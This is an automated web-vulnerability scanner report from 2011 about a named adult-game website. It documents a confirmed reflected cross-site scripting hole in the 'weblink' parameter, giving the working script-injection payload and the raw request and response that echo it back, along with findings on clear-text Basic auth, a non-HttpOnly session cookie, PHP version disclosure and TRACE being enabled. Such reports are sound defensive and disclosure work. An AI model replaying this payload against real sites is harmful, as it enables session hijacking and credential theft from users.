Reflected XSS, www.outcastacademy.com REPORT SUMMARY

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.outcastacademy.com/
SCAN DATE
4/21/2011 9:02:48 AM
REPORT DATE
4/21/2011 9:07:57 AM
SCAN DURATION
00:00:44

Total Requests

Average Speed

req/sec.
6
identified
5
confirmed
0
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
33 %
LOW
50 %
INFORMATION
17 %

GHDB, DORK VULNERABILITIES

GHDB, DORK VULNERABILITIES
URL Parameter Method Vulnerability Confirmed
/ Cookie Not Marked As HttpOnly Yes
PHP Version Disclosure No
TRACE / TRACK Identified Yes
/play/ Basic Authorisation over Clear Text Yes
/promo/ Forbidden Resource Yes
/webmasteroutcast.php weblink GET Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

1 TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /webmasteroutcast.php

/webmasteroutcast.php CONFIRMED

http://www.outcastacademy.com/webmasteroutcast.php?weblink='%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
weblink GET '"--></style></script><script>alert(0x000011)</script>

Request

GET /webmasteroutcast.php?weblink='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000011)%3C/script%3E HTTP/1.1
Referer: http://www.outcastacademy.com/webmasteroutcast.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 2293
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Outcast Academy Affiliate Program- Lesson of Passion PREMIUM site by leonizer</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="outcast academy, leonizer, lesson of passion, sex game, sex, date, game, date game, flash game, tokage" /><link href="style_lop.css" rel="stylesheet" type="text/css"><link rel="shortcut icon" href="/favicon.ico"><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script><style type="text/css">body {background: #212121 url(back_episodes.jpg) no-repeat center top;font: small calibri, tahoma, arial, sans-serif;margin: 0px 0px 0px 0px;}</style></head><body> <center><div id="web"> <center><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><span class = "big">Welcome to the Outcast Academy Affiliate Program</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br />Outcast Academy is a PREMIUM site of Lesson of Passion games.<br /><strong>It`s very easy to start</strong>. Please follow our 1-2-3 step instruction and start generate income in a minutes.<br /><span class = "medium">So, what are you waiting for? Sign up now and become a very bad, bad webmaster :)</span><br /><br /><br /><span class = "big">Why do we think that our program will rock your world?</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br /><span class = "medium">Outstanding conversions</span><br />100% unique and high quality content<br /><br /><span class = "medium">50% commission</span><br />On all refered sales: single payment, recurring and rebills<br /><br /><span class = "medium">Rebills</span><br />We plan regular, weekly updates to keep our devoted users with us<br /><br /><br /><span class = "big">Step 1 - create you affiliate ID</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><form action="https://affiliateadmin.ccbill.com/signup.cgi" method=POST><input type=hidden name=CA value="939539-0000"><!--Place a Group Name or Group ID number in the value for GR toautomatically add new affiliates into a group. The Group must exist in your admin setup for this option to work.--><input type=hidden name=GR value=""><input type=hidden name=page_background value=""><input type=hidden name=page_bgcolor value="#FFFFFF"><input type=hidden name=page_text value="#000000"><input type=hidden name=page_link value="blue"><input type=hidden name=page_vlink value="purple"><input type=hidden name=page_alink value="blue"><input type=hidden name=table_left value="#AEAEFF"><input type=hidden name=table_right value="#FEFFC1"><input type=hidden name=table_text value="#000000"><input type=hidden name=star_color value="#CC0000"><br><br>If you have not yet signed up under a CCBill sponsored affiliate program you can<font size=2><input type=submit value="create a new account"></font><input type=hidden name=second value=1></form><br><br>To load your current data, please enter your ID, username and password.<br><br><form action="https://affiliateadmin.ccbill.com/signup.cgi" method=POST><input type=hidden name=CA value="939539-0000"><!--Place a Group Name or Group ID number in the value for GR toautomatically add new affiliates into a group. The Group mustexist in your admin setup for this option to work.--><input type=hidden name=GR value=""><input type=hidden name=page_background value=""><input type=hidden name=page_bgcolor value="#FFFFFF"><input type=hidden name=page_text value="#000000"><input type=hidden name=page_link value="blue"><input type=hidden name=page_vlink value="purple"><input type=hidden name=page_alink value="blue"><input type=hidden name=table_left value="#AEAEFF"><input type=hidden name=table_right value="#FEFFC1"><input type=hidden name=table_text value="#000000"><input type=hidden name=star_color value="#CC0000"><table border=0 cellpadding=4 cellspacing=2 width=30%><tr valign=middle align=left><td bgcolor=#AEAEFF>Current ID</td><td bgcolor=#FEFFC1><input type=text name=EID size=15 maxlength=15></td></tr><tr valign=middle align=left><td bgcolor=#AEAEFF>Username</td><td bgcolor=#FEFFC1><input type=text name=username size=15 maxlength=15></td></tr><tr valign=middle align=left><td bgcolor=#AEAEFF>Password</td><td bgcolor=#FEFFC1><input type=password name=password size=15 maxlength=15></td></tr><tr valign=middle align=left><td>   </td><td><input type=submit value="Retrieve data">    <input type=reset value=Clear></td></tr></table><input type=hidden name=second value=1></form><br /><br /><span class = "big">Step 2 - generate your promo link</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br /><form method=GET>Your CCBILL Affiliate ID:<input type="edit" value="\'\"--></style></script><script>netsparker(0x000011)</script>" name="weblink" />&nbsp;&nbsp;<input type=submit value="Generate your Outcast Academy promo link" /></form><br /><strong>Use this link to promote Outcast Academy</strong>:<br />http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=939539-0003&PA=\'\"--></style></script><script>netsparker(0x000011)</script><br /><br /><br /><span class = "big">Step 3 - place Outcast Academy banners on your site</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br /><br /><img src="promo/hor_640x110_01.jpg" border ="0"/><br /><br /><img src="promo/hor_640x110_02.jpg" border ="0"/><br /><br /><br /><img src="promo/vert_160x600_01.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_02.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_03.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_04.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x600_05.jpg" border ="0"/>&nbsp;&nbsp;<br /><br /><img src="promo/vert_160x300_01.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_02.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_03.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_04.jpg" border ="0"/>&nbsp;&nbsp;<img src="promo/vert_160x300_05.jpg" border ="0"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_01.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_02.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_03.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_04.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_05.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_06.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_07.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_08.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_09.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><img src="promo/outcastacademy_500x500_10.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_11.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<img src="promo/outcastacademy_500x500_12.jpg" border ="0" width="300" height="300"/>&nbsp;&nbsp;<br /><br /><span class = "big">Need something extra?</span><br /><br /><img src="outcast_bar.png" border ="0"/><br /><br />In a future we plan to add new promo tools such as episode demos with referal ID`s and more.<br />If you want something more - please just <a href="support.php" target = "_blank" >let us know</a>.<br /><br /><br /><img src="logo_lop.png" border ="0"/><br /><br /><strong>© 2011 Outcast Academy by Lesson of Passion games</strong> <br /><br /><br /><br />
Basic Authorisation over Clear Text

Basic Authorisation over Clear Text

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that the application is using Basic Authorisation over HTTP. Basic Authentication sends username and password in plain text.

Impact

If an attacker can intercept traffic on the network, he/she might be able to steal the users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your directories which require authentication to be served only over HTTPS and disable any access to these pages over HTTP.

Remedy

All sensitive data should be transferred only over HTTPS.
- /play/

/play/ CONFIRMED

http://www.outcastacademy.com/play/

Request

GET /play/ HTTP/1.1
Referer: http://www.outcastacademy.com/play/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 401 Authorization Required
Date: Thu, 21 Apr 2011 13:43:46 GMT
Server: Apache/2
WWW-Authenticate: Basic realm="RESTRICTED"
Content-Length: 594
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Authorization Required</title></head><body><h1>Authorization Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.outcastacademy.com Port 80</address></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /

/ CONFIRMED

http://www.outcastacademy.com/

Identified Cookie

PHPSESSID

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=d3e38e7bfe299e4c6763cbd45d07e5e2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 1735
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Outcast Academy - Lesson of Passion PREMIUM site by leonizer</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="outcast academy, leonizer, lesson of passion, sex game, sex, date, game, date game, flash game, tokage" /><link href="style_lop.css" rel="stylesheet" type="text/css"><link rel="shortcut icon" href="/favicon.ico"><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script></head><body> <noembed><a href="index.php" title="Outcast Academy erotic flash game">Welcome to our academyWe will support your change into a better young woman. With good manners, well educated and ready for life in a modern society. If you are sentenced here... ...it means that you were bad bad girl.</a><a href="girls.php" title="Sexy flash game Outcast Academy">Academy is populated with many young students who were directed here from all over the world. Girls has split themselves ints ome kind of fractions - Models, Emos and more. Sometimes there are incidents between them but management tries to keep everything under control.</a></noembed><center><div id="site"> <div id="girlstop"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","480","height","380","src", "flash_girlstop", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","flash_girlstop" , "menu", "false", "wmode", "transparent", "z-index","-1"); //end AC code</script></div><div id="slider"><img src="sd_01.jpg"/><img src="sd_02.jpg"/><img src="sd_03.jpg"/><img src="sd_04.jpg"/><img src="sd_05.jpg"/></div><div id="join"><a href="/ccbill"><img src="but_join.png"/ border = "0" title = "Join the Outcast Academy"></a></div><div id="erica"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","290","height","420","src", "flash_erica", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","flash_erica" , "menu", "false", "wmode", "transparent", "z-index","-1"); //end AC code</script></div></div><div id="content"><center><a href="/ccbill" class = "red"><img src="but_join.png" border ="0" title = "Join the Outcast Academy"/></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="/play/index.php" class = "red"><img src="but_members.png" border ="0" title = "Outcast Academy: login for existing customers"/></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="girls.php" class = "red"><img src="but_more.png" border ="0"/></a>&nbsp;&nbsp;&nbsp;<br /><br /><strong>Do you need our support?</strong> Please <a href="http://lessonofpassion.com/support/index.php?type=outcast" target = "_blank" >contact</a> us.<br /><br /><a href="webmasteroutcast.php"><img src="but_webmasters.png" border ="0"/></a><br /><br />WARNING: This website contains explicit adult material. You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. <br /><br /><img src="logo_lop.png" border ="0"/><br /><br /><strong>© 2011 Outcast Academy by Lesson of Passion games</strong> <br /><br /><br /><br /></center></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">try {_uacct = "UA-2399441-30";urchinTracker();} catch(err) {}</script> </body></html>
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /

/

http://www.outcastacademy.com/

Extracted Version

PHP/5.2.11

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=3b38a206433a44e367bb0cff67776eaf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Encoding:
Content-Length: 1735
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Outcast Academy - Lesson of Passion PREMIUM site by leonizer</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="keywords" content="outcast academy, leonizer, lesson of passion, sex game, sex, date, game, date game, flash game, tokage" /><link href="style_lop.css" rel="stylesheet" type="text/css"><link rel="shortcut icon" href="/favicon.ico"><script src="AC_RunActiveContent.js" type="text/javascript"></script><link rel="stylesheet" href="nivo-slider.css" type="text/css" media="screen" /><script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script><script src="jquery.nivo.slider.pack.js" type="text/javascript"></script><script type="text/javascript">$(window).load(function() { $("#slider").nivoSlider();});</script></head><body> <noembed><a href="index.php" title="Outcast Academy erotic flash game">Welcome to our academyWe will support your change into a better young woman. With good manners, well educated and ready for life in a modern society. If you are sentenced here... ...it means that you were bad bad girl.</a><a href="girls.php" title="Sexy flash game Outcast Academy">Academy is populated with many young students who were directed here from all over the world. Girls has split themselves ints ome kind of fractions - Models, Emos and more. Sometimes there are incidents between them but management tries to keep everything under control.</a></noembed><center><div id="site"> <div id="girlstop"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","480","height","380","src", "flash_girlstop", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","flash_girlstop" , "menu", "false", "wmode", "transparent", "z-index","-1"); //end AC code</script></div><div id="slider"><img src="sd_01.jpg"/><img src="sd_02.jpg"/><img src="sd_03.jpg"/><img src="sd_04.jpg"/><img src="sd_05.jpg"/></div><div id="join"><a href="/ccbill"><img src="but_join.png"/ border = "0" title = "Join the Outcast Academy"></a></div><div id="erica"><script type="text/javascript">AC_FL_RunContent( "codebase","http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0","width","290","height","420","src", "flash_erica", "quality","high", "pluginspage", "http://www.macromedia.com/go/getflashplayer","movie","flash_erica" , "menu", "false", "wmode", "transparent", "z-index","-1"); //end AC code</script></div></div><div id="content"><center><a href="/ccbill" class = "red"><img src="but_join.png" border ="0" title = "Join the Outcast Academy"/></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="/play/index.php" class = "red"><img src="but_members.png" border ="0" title = "Outcast Academy: login for existing customers"/></a>&nbsp;&nbsp;&nbsp;&nbsp;<a href="girls.php" class = "red"><img src="but_more.png" border ="0"/></a>&nbsp;&nbsp;&nbsp;<br /><br /><strong>Do you need our support?</strong> Please <a href="http://lessonofpassion.com/support/index.php?type=outcast" target = "_blank" >contact</a> us.<br /><br /><a href="webmasteroutcast.php"><img src="but_webmasters.png" border ="0"/></a><br /><br />WARNING: This website contains explicit adult material. You may only use this Website if you are at least 18 years of age, or at least the age of majority in the jurisdiction where you reside or from which you access this Website. If you do not meet these requirements, then you do not have permission to use the Website. <br /><br /><img src="logo_lop.png" border ="0"/><br /><br /><strong>© 2011 Outcast Academy by Lesson of Passion games</strong> <br /><br /><br /><br /></center></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">try {_uacct = "UA-2399441-30";urchinTracker();} catch(err) {}</script> </body></html>
TRACE / TRACK Identified

TRACE / TRACK Identified

1 TOTAL
LOW
CONFIRMED
1
Netsparker identified that the TRACE/TRACK method is allowed.

Impact

If the application is vulnerable to Cross-site Scripting and uses Http-Only Cookies then an attacker can bypass the Http-Only cookies limitation and read the cookies in an XSS attack.

Remedy

Disable this method in all production systems. Even though the application is not vulnerable to Cross-site Scripting a debugging feature such as TRACE/TRACK should not be required in a production system and therefore should be disabled.

External References

- /

/ CONFIRMED

http://www.outcastacademy.com/

Request

TRACE / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 21 Apr 2011 13:43:45 GMT
Server: Apache/2
Transfer-Encoding: chunked
Content-Type: message/http


TRACE / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /promo/

/promo/ CONFIRMED

http://www.outcastacademy.com/promo/

Request

GET /promo/ HTTP/1.1
Referer: http://www.outcastacademy.com/promo/hor_640x110_01.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.outcastacademy.com
Cookie: PHPSESSID=a72552e6db7ec789b19fdf5a9bb25d1b
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Thu, 21 Apr 2011 13:43:46 GMT
Server: Apache/2
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /promo/on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2 Server at www.outcastacademy.com Port 80</address></body></html>